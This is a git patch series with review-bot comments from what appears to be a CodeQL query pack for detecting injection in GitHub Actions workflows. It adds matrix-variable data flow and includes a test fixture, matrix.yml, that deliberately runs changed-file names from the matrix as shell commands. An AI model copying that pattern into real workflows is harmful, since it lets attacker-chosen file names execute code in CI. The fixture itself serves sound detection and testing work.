.github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | semmle.label | ${{ job ... put2 }} | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | semmle.label | job-out ... utput}} [job-output1] | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output2] | semmle.label | job-out ... 
utput}} [job-output2] | +| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | semmle.label | ${{ ste ... utput}} | +| .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | semmle.label | ${{ ste ... files}} | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | semmle.label | id: step1 [step-output] | +| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | semmle.label | ${{ inp ... path }} | +| .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | semmle.label | \| | +| .github/workflows/reusable_workflow.yml:31:9:33:43 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | semmle.label | id: summary [value] | +| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | +| .github/workflows/simple1.yml:15:14:16:50 | \| | semmle.label | \| | +| .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | +| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/simple2.yml:28:14:31:15 | \| | semmle.label | \| | +| .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | semmle.label | job_out ... test }} [job_output] | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | semmle.label | ${{ ste ... test }} | +| .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | semmle.label | id: step0 [value] | +| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | +| .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | semmle.label | id: step1 [MSG] | +| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | semmle.label | ${{ ste ... 
value}} | +| .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | semmle.label | id: step2 [test] | +| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | semmle.label | ${{step ... s.MSG}} | +| .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| composite-actions/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet | +| composite-actions/action.yml:24:7:31:4 | name: Remove foo [value] | semmle.label | name: Remove foo [value] | +| composite-actions/action.yml:28:17:28:42 | ${{ inp ... reet }} | semmle.label | ${{ inp ... reet }} | +| composite-actions/action.yml:32:12:32:50 | echo ${ ... alue }} | semmle.label | echo ${ ... alue }} | +| composite-actions/action.yml:35:12:35:51 | echo "H ... et }}." | semmle.label | echo "H ... et }}." | +subpaths +| .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output1] | .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | +#select +| .github/workflows/argus_case_study.yml:26:14:27:95 | \| | .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | Potential injection from the ${{ steps.remove_quotations.outputs.replaced }}, which may be controlled by an external user. | +| .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | Potential injection from the ${{ needs.call2.outputs.workflow-output1 }}, which may be controlled by an external user. | +| .github/workflows/calling_workflow.yml:36:14:36:61 | echo ${ ... 
put2 }} | .github/workflows/reusable_workflow.yml:31:9:33:43 | name: G ... d files | .github/workflows/calling_workflow.yml:36:14:36:61 | echo ${ ... put2 }} | Potential injection from the ${{ needs.call2.outputs.workflow-output2 }}, which may be controlled by an external user. | +| .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | Potential injection from the ${{ needs.call3.outputs.workflow-output }}, which may be controlled by an external user. | +| .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | .github/workflows/calling_workflow.yml:20:5:21:2 | uses: o ... .yml@v1 | .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | Potential injection from the ${{ needs.call4.outputs.workflow-output }}, which may be controlled by an external user. | +| .github/workflows/changed-files.yml:21:14:24:15 | \| | .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | .github/workflows/changed-files.yml:21:14:24:15 | \| | Potential injection from the ${{ steps.changed-files.outputs.all_changed_files }}, which may be controlled by an external user. | +| .github/workflows/cross3.yml:41:12:43:5 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:41:12:43:5 | \| | Potential injection from the ${{ env.ISSUE_BODY_PARSED }}, which may be controlled by an external user. | +| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential injection from the ${{ env.auto_branch }}, which may be controlled by an external user. | +| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... 
ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential injection from the ${{ env.destination_branch }}, which may be controlled by an external user. | +| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential injection from the ${{ env.pr_message }}, which may be controlled by an external user. | +| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential injection from the ${{ env.user_name }}, which may be controlled by an external user. | +| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential injection from the ${{ github.event.after }}, which may be controlled by an external user. | +| .github/workflows/image_link_generator.yml:36:14:37:126 | \| | .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | Potential injection from the ${{ steps.trim-url.outputs.trimmed_url }}, which may be controlled by an external user. | +| .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | Potential injection from the ${{ needs.job1.outputs.job_output }}, which may be controlled by an external user. | +| .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | Potential injection from the ${{ inputs.config-path }}, which may be controlled by an external user. 
| +| .github/workflows/simple1.yml:15:14:16:50 | \| | .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:15:14:16:50 | \| | Potential injection from the ${{ steps.summary.outputs.value }}, which may be controlled by an external user. | +| .github/workflows/simple2.yml:28:14:31:15 | \| | .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | .github/workflows/simple2.yml:28:14:31:15 | \| | Potential injection from the ${{ steps.step.outputs.value }}, which may be controlled by an external user. | +| .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | Potential injection from the ${{ needs.job1.outputs.job_output }}, which may be controlled by an external user. | +| composite-actions/action.yml:32:12:32:50 | echo ${ ... alue }} | composite-actions/action.yml:4:3:4:14 | input who-to-greet | composite-actions/action.yml:32:12:32:50 | echo ${ ... alue }} | Potential injection from the ${{ steps.replace.outputs.value }}, which may be controlled by an external user. | +| composite-actions/action.yml:35:12:35:51 | echo "H ... et }}." | composite-actions/action.yml:4:3:4:14 | input who-to-greet | composite-actions/action.yml:35:12:35:51 | echo "H ... et }}." | Potential injection from the ${{ inputs.who-to-greet }}, which may be controlled by an external user. | From 447b65e7a96b6dd4d3fe41c76d8d8f8d95564d1b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 28 Feb 2024 12:37:41 +0100 Subject: [PATCH 0077/1267] Add script to build full DBs (testproj ones remove source code origin) --- build-test-dbs.sh | 5 +++++ 1 file changed, 5 insertions(+) create mode 100755 build-test-dbs.sh diff --git a/build-test-dbs.sh b/build-test-dbs.sh new file mode 100755 index 00000000000..d8fc4359b92 --- /dev/null +++ b/build-test-dbs.sh 
@@ -0,0 +1,5 @@ +#!/bin/bash +rm -rf src-test.testproj || true +rm -rf lib-test.testproj || true +codeql database create src-test.testproj -l yaml -s ql/src/test +codeql database create lib-test.testproj -l yaml -s ql/lib/test From 8a9ec88b36422ab7f40bedd3abb5a07492beee54 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 28 Feb 2024 13:21:29 +0100 Subject: [PATCH 0078/1267] feat(matrix): Add support for flow through matrix vars --- ql/lib/codeql/actions/Ast.qll | 78 +++++++++++++++++-- .../actions/controlflow/internal/Cfg.qll | 22 +++++- .../dataflow/internal/DataFlowPrivate.qll | 15 +++- ql/src/{test => Debug}/partial.ql | 2 +- ql/src/test/.github/workflows/matrix.yml | 42 ++++++++++ ql/src/test/partial.expected | 28 ------- ql/src/test/test.expected | 10 +++ 7 files changed, 159 insertions(+), 38 deletions(-) rename ql/src/{test => Debug}/partial.ql (92%) create mode 100644 ql/src/test/.github/workflows/matrix.yml delete mode 100644 ql/src/test/partial.expected diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 2a506f2100c..c2b1cda8277 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -81,6 +81,8 @@ class WorkflowStmt extends Statement instanceof Actions::Workflow { } Statement getPermissionsStmt() { result = this.(YamlMapping).lookup("permissions") } + + StrategyStmt getStrategyStmt() { result = this.(YamlMapping).lookup("strategy") } } class ReusableWorkflowStmt extends WorkflowStmt { 
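Review bot: Nothing in the new `build-test-dbs.sh` stops the script when the first `codeql database create` fails, and both source paths (`ql/src/test`, `ql/lib/test`) only resolve when it is run from the repository root. `rm -rf` already succeeds on a missing path, so the `|| true` suffixes can only hide a real removal error. I would add `set -euo pipefail` and `cd "$(dirname "$0")"` right after the shebang and drop the `|| true`; the same applies to the two `rm -rf` lines added by the later "Update test db build script" commit.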
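Review bot: `WorkflowStmt.getStrategyStmt()` looks up `strategy` on the top-level workflow mapping, but in GitHub Actions workflow syntax `strategy` is defined only under `jobs.<job_id>`, so this accessor should never bind on a valid workflow. The same assumption is repeated in the workflow branch of `MatrixCtxAccessExpr.getRefExpr()` and in the two `WorkflowTree` hunks in `Cfg.qll`. If it is intentional, a QLDoc line such as `/** Gets the workflow-level strategy mapping, if any; not part of the documented workflow schema. */` would say so; otherwise I would keep only the `JobStmt` accessor. The class body starts outside the hunk.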
@@ -125,6 +127,23 @@ class OutputsStmt extends Statement instanceof YamlMapping { string getAnOutputName() { this.(YamlMapping).maps(any(YamlString s | s.getValue() = result), _) } } +class StrategyStmt extends Statement instanceof YamlMapping { + YamlMapping parent; + + StrategyStmt() { parent.lookup("strategy") = this } + + /** + * Gets a specific matric expression (YamlMapping) by name. + */ + MatrixVariableExpr getMatrixVariableExpr(string name) { + this.(YamlMapping).lookup("matrix").(YamlMapping).lookup(name) = result + } + + string getAMatrixVariableName() { + this.(YamlMapping).maps(any(YamlString s | s.getValue() = result), _) + } +} + class InputExpr extends Expression instanceof YamlString { InputExpr() { exists(InputsStmt inputs | inputs.(YamlMapping).maps(this, _)) } } @@ -138,6 +157,14 @@ class OutputExpr extends Expression instanceof YamlString { } } +class MatrixVariableExpr extends Expression instanceof YamlString { + MatrixVariableExpr() { + exists(StrategyStmt outputs | + outputs.(YamlMapping).lookup("matrix").(YamlMapping).lookup(_) = this + ) + } +} + /** * A Job is a collection of steps that run in an execution environment. */ @@ -191,6 +218,8 @@ class JobStmt extends Statement instanceof Actions::Job { IfStmt getIfStmt() { result = super.getIf() } Statement getPermissionsStmt() { result = this.(YamlMapping).lookup("permissions") } + + StrategyStmt getStrategyStmt() { result = this.(YamlMapping).lookup("strategy") } } /** @@ -332,7 +361,8 @@ class ExprAccessExpr extends Expression instanceof YamlString { class CtxAccessExpr extends ExprAccessExpr { CtxAccessExpr() { expr.regexpMatch([ - stepsCtxRegex(), needsCtxRegex(), jobsCtxRegex(), envCtxRegex(), inputsCtxRegex() + stepsCtxRegex(), needsCtxRegex(), jobsCtxRegex(), envCtxRegex(), inputsCtxRegex(), + matrixCtxRegex() ]) } 
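Review bot: `getAMatrixVariableName()` enumerates the keys of the `strategy` mapping itself (`fail-fast`, `matrix`, ...) rather than the keys under `matrix`, apparently carried over from `OutputsStmt.getAnOutputName()`. It should go through the nested mapping the way `getMatrixVariableExpr` does: `this.(YamlMapping).lookup("matrix").(YamlMapping).maps(any(YamlString s | s.getValue() = result), _)`. The QLDoc above `getMatrixVariableExpr` has a typo (`matric`). The `parent` field is only used in the characteristic predicate and would read better as `exists(YamlMapping parent | parent.lookup("strategy") = this)`.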
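Review bot: `MatrixVariableExpr` covers only matrix entries whose value is a scalar string (`instanceof YamlString` on `lookup("matrix").(YamlMapping).lookup(_)`). A matrix given as one expression, e.g. `matrix: ${{ fromJSON(...) }}`, or variables introduced through `matrix.include`, therefore produce no node, and flows into `${{ matrix.x }}` would presumably be missed for those shapes. A QLDoc comment on the class stating the supported shape would make that limit explicit. The bound variable is also named `outputs` although it is a `StrategyStmt`; `strategy` would read better.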
@@ -342,22 +372,28 @@ class CtxAccessExpr extends ExprAccessExpr { } private string stepsCtxRegex() { - result = "\\bsteps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)\\b" + result = wrapRegexp("steps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") } private string needsCtxRegex() { - result = "\\bneeds\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)\\b" + result = wrapRegexp("needs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") } private string jobsCtxRegex() { - result = "\\bjobs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)\\b" + result = wrapRegexp("jobs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") } -private string envCtxRegex() { result = "\\benv\\.([A-Za-z0-9_-]+)\\b" } +private string envCtxRegex() { result = wrapRegexp("env\\.([A-Za-z0-9_-]+)") } + +private string matrixCtxRegex() { result = wrapRegexp("matrix\\.([A-Za-z0-9_-]+)") } private string inputsCtxRegex() { - result = "\\binputs\\.([A-Za-z0-9_-]+)\\b" or - result = "\\bgithub\\.event\\.inputs\\.([A-Za-z0-9_-]+)\\b" + result = wrapRegexp(["inputs\\.([A-Za-z0-9_-]+)", "github\\.event\\.inputs\\.([A-Za-z0-9_-]+)"]) +} + +bindingset[regex] +private string wrapRegexp(string regex) { + result = ["\\b" + regex + "\\b", "fromJSON\\(" + regex + "\\)", "toJSON\\(" + regex + "\\)"] } /** 
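Review bot: `wrapRegexp` accepts only the exact spellings `fromJSON(` and `toJSON(` with no whitespace inside the parentheses. An expression written as `fromJson(needs.x.outputs.y)` or `fromJSON( needs.x.outputs.y )` would presumably not be recognised as a context access, and the flow through it would be dropped. As far as I know, function names in Actions expressions are not case-sensitive, which makes this a likely source of false negatives. A tolerant form would be `"(?i:fromjson|tojson)\\(\\s*" + regex + "\\s*\\)"`, which leaves the capture-group numbering unchanged. A short QLDoc on `wrapRegexp` naming the accepted shapes would also help.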
@@ -487,3 +523,31 @@ class EnvCtxAccessExpr extends CtxAccessExpr { ) } } + +/** + * Holds for an expression accesing the `matrix` context. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. `${{ matrix.foo }}` + */ +class MatrixCtxAccessExpr extends CtxAccessExpr { + string fieldName; + + MatrixCtxAccessExpr() { + expr.regexpMatch(matrixCtxRegex()) and + fieldName = expr.regexpCapture(matrixCtxRegex(), 1) + } + + override string getFieldName() { result = fieldName } + + override Expression getRefExpr() { + exists(WorkflowStmt w | + w.getStrategyStmt().getMatrixVariableExpr(fieldName) = result and + w.getAChildNode*() = this + ) + or + exists(JobStmt j | + j.getStrategyStmt().getMatrixVariableExpr(fieldName) = result and + j.getAChildNode*() = this + ) + } +} diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 94a2c6a71e2..b8137172b8c 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -174,6 +174,7 @@ private class WorkflowTree extends StandardPreOrderTree instanceof WorkflowStmt ( child = this.(ReusableWorkflowStmt).getInputsStmt() or child = this.(ReusableWorkflowStmt).getOutputsStmt() or + child = this.(ReusableWorkflowStmt).getStrategyStmt() or child = this.(ReusableWorkflowStmt).getAJobStmt() ) and l = child.getLocation() @@ -185,7 +186,10 @@ private class WorkflowTree extends StandardPreOrderTree instanceof WorkflowStmt else result = rank[i](Expression child, Location l | - child = super.getAJobStmt() and + ( + child = super.getAJobStmt() or + child = super.getStrategyStmt() + ) and l = child.getLocation() | child 
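Review bot: `MatrixCtxAccessExpr` captures a single path segment after `matrix.` (`fieldName = expr.regexpCapture(matrixCtxRegex(), 1)`), so an access to a nested property such as `${{ matrix.os.name }}` would presumably not be classified here and its flow would be lost; if that is out of scope, the QLDoc should say so. The QLDoc also misspells `accessing` (as does the comment on `matrixCtxLocalStep` in `DataFlowPrivate.qll`). Being on a class, it would read better as `An expression accessing the matrix context, e.g. ${{ matrix.foo }}.`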
@@ -225,6 +229,21 @@ private class OutputsTree extends StandardPreOrderTree instanceof OutputsStmt { private class OutputExprTree extends LeafTree instanceof OutputExpr { } +private class StrategyTree extends StandardPreOrderTree instanceof StrategyStmt { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](Expression child, Location l | + child = super.getMatrixVariableExpr(_) and l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +private class MatrixVariableExprTree extends LeafTree instanceof MatrixVariableExpr { } + private class JobTree extends StandardPreOrderTree instanceof JobStmt { override ControlFlowTree getChildNode(int i) { result = @@ -232,6 +251,7 @@ private class JobTree extends StandardPreOrderTree instanceof JobStmt { ( child = super.getAStepStmt() or child = super.getOutputsStmt() or + child = super.getStrategyStmt() or child = super.getUsesExpr() ) and l = child.getLocation() diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 43239e29485..b9aafb8ec94 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -133,7 +133,7 @@ predicate typeStrongerThan(DataFlowType t1, DataFlowType t2) { none() } newtype TContent = TFieldContent(string name) { - // We only use field flow for steps and jobs outputs, not for accessing other context fields such as env or inputs + // We only use field flow for steps and jobs outputs, not for accessing other context fields such as env, matrix or inputs name = any(StepsCtxAccessExpr a).getFieldName() or name = any(NeedsCtxAccessExpr a).getFieldName() or name = any(JobsCtxAccessExpr a).getFieldName() 
@@ -209,6 +209,18 @@ predicate inputsCtxLocalStep(Node nodeFrom, Node nodeTo) { ) } +/** + * Holds if there is a local flow step between a ${{}} expression accesing a matrix variable and the matrix itself + * e.g. ${{ matrix.foo }} + */ +predicate matrixCtxLocalStep(Node nodeFrom, Node nodeTo) { + exists(Expression astFrom, MatrixCtxAccessExpr astTo | + astFrom = nodeFrom.asExpr() and + astTo = nodeTo.asExpr() and + astTo.getRefExpr() = astFrom + ) +} + /** * Holds if there is a local flow step between a ${{}} expression accesing an env var and the var definition itself * e.g. ${{ env.foo }} @@ -234,6 +246,7 @@ predicate localFlowStep(Node nodeFrom, Node nodeTo) { stepsCtxLocalStep(nodeFrom, nodeTo) or needsCtxLocalStep(nodeFrom, nodeTo) or inputsCtxLocalStep(nodeFrom, nodeTo) or + matrixCtxLocalStep(nodeFrom, nodeTo) or envCtxLocalStep(nodeFrom, nodeTo) } diff --git a/ql/src/test/partial.ql b/ql/src/Debug/partial.ql similarity index 92% rename from ql/src/test/partial.ql rename to ql/src/Debug/partial.ql index 779749f82f6..c0a694455dc 100644 --- a/ql/src/test/partial.ql +++ b/ql/src/Debug/partial.ql @@ -15,7 +15,7 @@ import PartialFlow::PartialPathGraph private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource and - source.getLocation().getFile().getBaseName() = "calling_workflow.yml" + source.getLocation().getFile().getBaseName() = "matrix.yml" } predicate isSink(DataFlow::Node sink) { none() } diff --git a/ql/src/test/.github/workflows/matrix.yml b/ql/src/test/.github/workflows/matrix.yml new file mode 100644 index 00000000000..30672ecaaa7 --- /dev/null +++ b/ql/src/test/.github/workflows/matrix.yml 
@@ -0,0 +1,42 @@ +name: "CodeQL Auto Language" + +on: + push: + branches: [ main ] + pull_request: + branches: [ main ] + schedule: + - cron: '17 19 * * 6' + +jobs: + create-matrix: + runs-on: ubuntu-latest + outputs: + matrix: ${{ steps.set-matrix.outputs.all_changed_files }} + steps: + - name: Get changed files + id: set-matrix + uses: tj-actions/changed-files@v40 + + analyze: + needs: create-matrix + if: ${{ needs.create-matrix.outputs.matrix != '[]' }} + name: Analyze + runs-on: ubuntu-latest + permissions: + actions: read + contents: read + security-events: write + + strategy: + fail-fast: false + matrix: + language: ${{ fromJSON(needs.create-matrix.outputs.matrix) }} + + steps: + - name: Checkout repository + uses: actions/checkout@v3 + + # Initializes the CodeQL tools for scanning. + - run: | + ${{ matrix.language }} diff --git a/ql/src/test/partial.expected b/ql/src/test/partial.expected deleted file mode 100644 index 98aea83de2e..00000000000 --- a/ql/src/test/partial.expected +++ /dev/null 
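Review bot: The fixture exercises only the tainted path (`fromJSON(needs.create-matrix.outputs.matrix)` into `${{ matrix.language }}`); there is no job with a literal matrix such as `language: [cpp, java]` feeding the same kind of `run:` step to pin that a static matrix raises no alert. A second job of that shape would guard against the new `matrixCtxLocalStep` over-reporting. The leftover comment `# Initializes the CodeQL tools for scanning.` no longer describes the `run` step below it.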
@@ -1,28 +0,0 @@ -edges -| .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | -| .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | -| .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | -| .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 [workflow-output] | .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | -| .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 [workflow-output] | -| .github/workflows/calling_workflow.yml:20:5:21:2 | uses: o ... .yml@v1 | .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | -| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | -| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | -| .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output1] | -| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | -| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | -| .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... 
utput}} | -| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | -#select -| .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | -| .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 | .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 [workflow-output] | This node receives taint from $@. | .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | this source | -| .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | -| .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | This node receives taint from $@. | .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | this source | -| .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | .github/workflows/calling_workflow.yml:20:5:21:2 | uses: o ... .yml@v1 | .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | This node receives taint from $@. | .github/workflows/calling_workflow.yml:20:5:21:2 | uses: o ... 
.yml@v1 | this source | -| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | -| .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output1] | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | -| .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | -| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | -| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | -| .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... 
